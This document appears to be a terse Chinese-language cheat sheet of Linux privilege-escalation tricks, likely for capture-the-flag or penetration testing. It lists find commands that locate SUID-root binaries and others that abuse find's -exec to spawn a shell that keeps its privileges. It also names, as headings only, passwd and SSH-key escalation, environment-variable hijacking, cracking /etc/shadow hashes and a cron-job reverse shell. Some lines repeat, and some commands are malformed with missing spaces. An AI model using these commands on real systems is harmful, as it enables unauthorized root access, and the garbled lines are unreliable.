find(suid)
find -name flag.txt -exec /bin/sh \;
查找系统中设置suid位的程序(提权的快捷方式)
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;
搜索文件进行提取
find . -exec /bin/sh -p \; -quit
passwd提权
ssh密钥提权
劫持环境变量
find / -perm -u=s -type f 2>/dev/null
破解密码
利用/etc/shadow文件中root字段信息破解密码
计划定时任务反弹shell提权
